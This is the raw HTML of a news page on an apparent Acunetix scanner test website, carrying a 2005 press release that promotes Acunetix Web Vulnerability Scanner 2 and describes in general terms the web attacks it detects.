value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo+fii5vVAAhGyfGRVNk1" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLjj6S6DAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJXwOObHp1dq30nemUavTDCszjxx" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" 